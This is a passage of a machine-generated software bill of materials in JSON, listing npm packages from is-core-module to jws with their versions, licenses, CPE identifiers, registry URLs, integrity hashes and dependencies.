idse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==","dependencies":{"binary-extensions":"^2.0.0"}}},{"id":"9f592f96ab7392ec","name":"is-core-module","version":"2.16.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-core-module@2.16.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz","integrity":"sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==","dependencies":{"hasown":"^2.0.2"}}},{"id":"b2879743f62f2c47","name":"is-extglob","version":"2.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-extglob@2.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz","integrity":"sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==","dependencies":null}},{"id":"8a7d27e13373f9f8","name":"is-fullwidth-code-point","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-fullwidth-code-point@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz","integrity":"sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==","dependencies":null}},{"id":"6a2e0a343ed2b45b","name":"is-glob","version":"4.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-glob@4.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz","integrity":"sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==","dependencies":{"is-extglob":"^2.1.1"}}},{"id":"19d61645d0264090","name":"is-number","version":"7.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-number@7.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz","integrity":"sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==","dependencies":null}},{"id":"0d47a7f43264d12f","name":"is-stream","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-stream@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz","integrity":"sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==","dependencies":null}},{"id":"0055323086e6dbe0","name":"is-url","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-url@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz","integrity":"sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww==","dependencies":null}},{"id":"14ac0fadd6b69d11","name":"isarray","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/isarray@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz","integrity":"sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==","dependencies":null}},{"id":"18556628c2ed871d","name":"isexe","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/isexe@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz","integrity":"sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==","dependencies":null}},{"id":"668b76a592331d7f","name":"jackspeak","version":"3.4.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BlueOak-1.0.0","spdxExpression":"BlueOak-1.0.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/jackspeak@3.4.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz","integrity":"sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==","dependencies":{"@isaacs/cliui":"^8.0.2"}}},{"id":"c5304af01a3223ed","name":"jay-peg","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/jay-peg@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz","integrity":"sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww==","dependencies":{"restructure":"^3.0.0"}}},{"id":"a3b57ee8874ce4dc","name":"jiti","version":"1.21.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/jiti@1.21.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz","integrity":"sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==","dependencies":null}},{"id":"0246497cf4065c27","name":"jose","version":"4.15.9","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/jose@4.15.9","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jose/-/jose-4.15.9.tgz","integrity":"sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA==","dependencies":null}},{"id":"eb8b761fb0d3a989","name":"js-beautify","version":"1.15.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/js-beautify@1.15.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz","integrity":"sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA==","dependencies":{"config-chain":"^1.1.13","editorconfig":"^1.0.4","glob":"^10.4.2","js-cookie":"^3.0.5","nopt":"^7.2.1"}}},{"id":"07274f4b8a4d661e","name":"js-cookie","version":"3.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/js-cookie@3.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz","integrity":"sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw==","dependencies":null}},{"id":"d30adc61a99cb3ed","name":"js-md5","version":"0.8.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/js-md5@0.8.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz","integrity":"sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ==","dependencies":null}},{"id":"132a500346fcea0c","name":"js-tokens","version":"4.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/js-tokens@4.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz","integrity":"sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==","dependencies":null}},{"id":"f29c1976ad3d8cb0","name":"json-bigint","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/json-bigint@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz","integrity":"sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==","dependencies":{"bignumber.js":"^9.0.0"}}},{"id":"2ebcc52db7d200cb","name":"jsonwebtoken","version":"9.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/jsonwebtoken@9.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz","integrity":"sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==","dependencies":{"jws":"^4.0.1","lodash.includes":"^4.3.0","lodash.isboolean":"^3.0.3","lodash.isinteger":"^4.0.4","lodash.isnumber":"^3.0.3","lodash.isplainobject":"^4.0.6","lodash.isstring":"^4.0.1","lodash.once":"^4.0.0","ms":"^2.1.1","semver":"^7.5.4"}}},{"id":"154697ca4fb19b8b","name":"jwa","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/jwa@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz","integrity":"sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==","dependencies":{"buffer-equal-constant-time":"^1.0.1","ecdsa-sig-formatter":"1.0.11","safe-buffer":"^5.0.1"}}},{"id":"014369d0efdc09b2","name":"jwks-rsa","version":"3.2.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/jwks-rsa@3.2.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz","integrity":"sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w==","dependencies":{"@types/jsonwebtoken":"^9.0.4","debug":"^4.3.4","jose":"^4.15.4","limiter":"^1.1.5","lru-memoizer":"^2.2.0"}}},{"id":"7fed8e7a1bc916bb","name":"jws","version":"4.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/j